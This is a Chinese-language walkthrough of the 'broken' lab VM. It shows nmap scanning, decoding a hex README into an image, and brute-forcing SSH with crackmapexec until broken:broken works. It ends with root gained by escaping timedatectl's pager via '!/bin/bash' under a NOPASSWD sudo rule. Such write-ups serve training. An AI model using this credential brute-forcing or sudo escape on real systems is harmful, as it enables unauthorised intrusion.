broken
照常扫描
主机发现
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.92.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:16 EST
Nmap scan report for 192.168.92.1
Host is up (0.00065s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00036s latency).
MAC Address: 00:50:56:E9:BE:0B (VMware)
Nmap scan report for 192.168.92.145
Host is up (0.00076s latency).
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00069s latency).
MAC Address: 00:50:56:E0:A6:00 (VMware)
Nmap scan report for 192.168.92.130
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.18 seconds
端口扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:17 EST
Nmap scan report for 192.168.92.145
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 17.95 seconds
tcp扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:18 EST
Nmap scan report for 192.168.92.145
Host is up (0.00042s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
| 256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
|_ 256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| 55K 2019-08-09 01:20 README.md
| 1.1K 2019-08-09 01:21 gallery.html
| 259K 2019-08-09 01:11 img_5terre.jpg
| 114K 2019-08-09 01:11 img_forest.jpg
| 663K 2019-08-09 01:11 img_lights.jpg
| 8.4K 2019-08-09 01:11 img_mountains.jpg
|_
MAC Address: 00:0C:29:27:E2:8C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.97 seconds
udp扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:19 EST
Nmap scan report for 192.168.92.145
Host is up (0.00078s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 33.03 seconds
脚本扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.92.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 08:20 EST
Stats: 0:02:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Stats: 0:02:41 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.52% done; ETC: 08:23 (0:00:02 remaining)
Nmap scan report for 192.168.92.145
Host is up (0.00040s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.92.145:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://192.168.92.145:80/?C=S%3BO%3DA%27%20OR%20sqlspider
|_ http://192.168.92.145:80/?C=D%3BO%3DA%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:27:E2:8C (VMware)
Nmap done: 1 IP address (1 host up) scanned in 335.17 seconds
没有啥有价值的
正常目录扫描
没有东西。奇怪
重新将端口扫描再来一遍
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/README.md
--2023-12-04 08:35:18-- http://192.168.92.145/README.md
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:56594 (55K)
正在保存至: “README.md”
README.md 100%[======================================================================>] 55.27K --.-KB/s 用时 0s
2023-12-04 08:35:18 (113 MB/s) - 已保存 “README.md” [56594/56594])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ file README.md
README.md: CSV ASCII text
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/^[[200~img_5terre.jpg~
zsh: bad pattern: http://192.168.92.145/^[[200~img_5terre.jpg~
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_5terre.jpg
--2023-12-04 08:36:42-- http://192.168.92.145/img_5terre.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:265415 (259K) [image/jpeg]
正在保存至: “img_5terre.jpg”
img_5terre.jpg 100%[======================================================================>] 259.19K --.-KB/s 用时 0.004s
2023-12-04 08:36:42 (63.8 MB/s) - 已保存 “img_5terre.jpg” [265415/265415])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_forest.jpg
--2023-12-04 08:45:36-- http://192.168.92.145/img_forest.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:116737 (114K) [image/jpeg]
正在保存至: “img_forest.jpg”
img_forest.jpg 100%[======================================================================>] 114.00K --.-KB/s 用时 0.001s
2023-12-04 08:45:36 (83.1 MB/s) - 已保存 “img_forest.jpg” [116737/116737])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/mg_lights.jpg
--2023-12-04 08:45:53-- http://192.168.92.145/mg_lights.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 404 Not Found
2023-12-04 08:45:53 错误 404:Not Found。
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_lights.jpg
--2023-12-04 08:46:02-- http://192.168.92.145/img_lights.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:678909 (663K) [image/jpeg]
正在保存至: “img_lights.jpg”
img_lights.jpg 100%[======================================================================>] 663.00K --.-KB/s 用时 0.009s
2023-12-04 08:46:02 (74.7 MB/s) - 已保存 “img_lights.jpg” [678909/678909])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ wget http://192.168.92.145/img_mountains.jpg
--2023-12-04 08:46:18-- http://192.168.92.145/img_mountains.jpg
正在连接 192.168.92.145:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:8555 (8.4K) [image/jpeg]
正在保存至: “img_mountains.jpg”
img_mountains.jpg 100%[======================================================================>] 8.35K --.-KB/s 用时 0s
2023-12-04 08:46:18 (89.6 MB/s) - 已保存 “img_mountains.jpg” [8555/8555])
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ ls
img_5terre.jpg img_forest.jpg img_lights.jpg img_mountains.jpg README.md
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ exiftool
Syntax: exiftool [OPTIONS] FILE
Consult the exiftool documentation for a full list of options.
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ exiftool *.jpg
======== img_5terre.jpg
ExifTool Version Number : 12.67
File Name : img_5terre.jpg
Directory : .
File Size : 265 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:36:42-05:00
File Inode Change Date/Time : 2023:12:04 08:36:42-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 72
Y Resolution : 72
Image Width : 1200
Image Height : 900
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:2 (2 1)
Image Size : 1200x900
Megapixels : 1.1
======== img_forest.jpg
ExifTool Version Number : 12.67
File Name : img_forest.jpg
Directory : .
File Size : 117 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:45:36-05:00
File Inode Change Date/Time : 2023:12:04 08:45:36-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : inches
X Resolution : 96
Y Resolution : 96
Image Width : 750
Image Height : 425
Encoding Process : Progressive DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 750x425
Megapixels : 0.319
======== img_lights.jpg
ExifTool Version Number : 12.67
File Name : img_lights.jpg
Directory : .
File Size : 679 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:46:02-05:00
File Inode Change Date/Time : 2023:12:04 08:46:02-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Profile CMM Type : Little CMS
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 2012:01:25 03:41:57
Profile File Signature : acsp
Primary Platform : Apple Computer Inc.
CMM Flags : Not Embedded, Independent
Device Manufacturer :
Device Model :
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Little CMS
Profile ID : 0
Profile Description : c2
Profile Copyright : FB
Media White Point : 0.9642 1 0.82491
Media Black Point : 0.01205 0.0125 0.01031
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Red Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)
Image Width : 2988
Image Height : 1680
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 2988x1680
Megapixels : 5.0
======== img_mountains.jpg
ExifTool Version Number : 12.67
File Name : img_mountains.jpg
Directory : .
File Size : 8.6 kB
File Modification Date/Time : 2019:08:09 04:11:02-04:00
File Access Date/Time : 2023:12:04 08:46:18-05:00
File Inode Change Date/Time : 2023:12:04 08:46:18-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 314
Image Height : 160
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 314x160
Megapixels : 0.050
4 image files read
图片内没啥信息
┌──(kali㉿kali)-[~/redteamnotes/broken](把md改为二进制文件)
└─$ xxd -r -ps README.md > README.bin
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ strings README.bin | head -n 20
JFIF
Compressed by jpeg-recompress
"*%%*424DD\
"*%%*424DD\
'X"U
}Y}IS>
p "#%0@P
4jgAL
~^+#5V
k&qo!
uMWn
d1Z%
%7D#
R1mB_d
PvPj
z1}fZ%(*%
]kDA>E
J*;iV
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ cp README.bin README.jpeg
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ ls
img_5terre.jpg img_forest.jpg img_lights.jpg img_mountains.jpg README.bin README.jpeg README.md
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ xdg-open README.jpeg
既然这里没东西,还开着22端口那就撞库
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ cat creds
clinque
terre
black
forest
northen
lights
mountains
bob
broken
avrajamcohen
avrajamcohen.ac
利用之前获得信息来做一个表
尝试撞库
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ sudo crackmapexec ssh 192.168.92.145 -u creds -p creds --continue-on-success
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing SSH protocol database
[*] Initializing FTP protocol database
[*] Initializing WINRM protocol database
[*] Initializing MSSQL protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SSH 192.168.92.145 22 192.168.92.145 [*] SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] clinque:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] terre:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] black:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] forest:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] northen:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] lights:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] mountains:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] bob:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [+] broken:broken
SSH 192.168.92.145 22 192.168.92.145 [-] broken:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] broken:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen:avrajamcohen.ac Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:clinque Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:terre Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:black Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:forest Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:northen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:lights Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:mountains Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:bob Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:broken Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:avrajamcohen Authentication failed.
SSH 192.168.92.145 22 192.168.92.145 [-] avrajamcohen.ac:avrajamcohen.ac Authentication failed.
幸好成功一个
SSH 192.168.92.145 22 192.168.92.145 [+] broken:broken
ssh连接
[[sudo timedatectl]]
成功连接
┌──(kali㉿kali)-[~/redteamnotes/broken]
└─$ sudo ssh broken@192.168.92.145
[sudo] kali 的密码:
The authenticity of host '192.168.92.145 (192.168.92.145)' can't be established.
ED25519 key fingerprint is SHA256:2rSjxvkij5hWypyT/706pdaI6YAB0AOIXa7kVnMBDZs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.145' (ED25519) to the list of known hosts.
broken@192.168.92.145's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)
* Documentation: https://help.ubuntu.com/
762 packages can be updated.
458 updates are security updates.
New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Aug 9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User broken may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/timedatectl
(ALL) NOPASSWD: /sbin/reboot
broken@ubuntu:~$ sudo /usr/bin/timedatectl list-timezones
Africa/Abidjan
Africa/Accra
Africa/Addis_Ababa
Africa/Algiers
Africa/Asmara
Africa/Bamako
Africa/Bangui
Africa/Banjul
Africa/Bissau
Africa/Blantyre
Africa/Brazzaville
Africa/Bujumbura
Africa/Cairo
Africa/Casablanca
Africa/Ceuta
Africa/Conakry
Africa/Dakar
Africa/Dar_es_Salaam
Africa/Djibouti
Africa/Douala
Africa/El_Aaiun
Africa/Freetown
Africa/Gaborone
Africa/Harare
Africa/Johannesburg
Africa/Juba
Africa/Kampala
Africa/Khartoum
Africa/Kigali
Africa/Kinshasa
Africa/Lagos
Africa/Libreville
Africa/Lome
Africa/Luanda
Africa/Lubumbashi
Africa/Lusaka
Africa/Malabo
Africa/Maputo
Africa/Maseru
Africa/Mbabane
Africa/Mogadishu
Africa/Monrovia
!/bin/bash
root@ubuntu:~# whoami
root
root@ubuntu:~# uname
Linux
root@ubuntu:~# uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
root@ubuntu:~# ls
Desktop Documents Downloads examples.desktop Music Pictures Public Templates Videos
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:27:e2:8c brd ff:ff:ff:ff:ff:ff
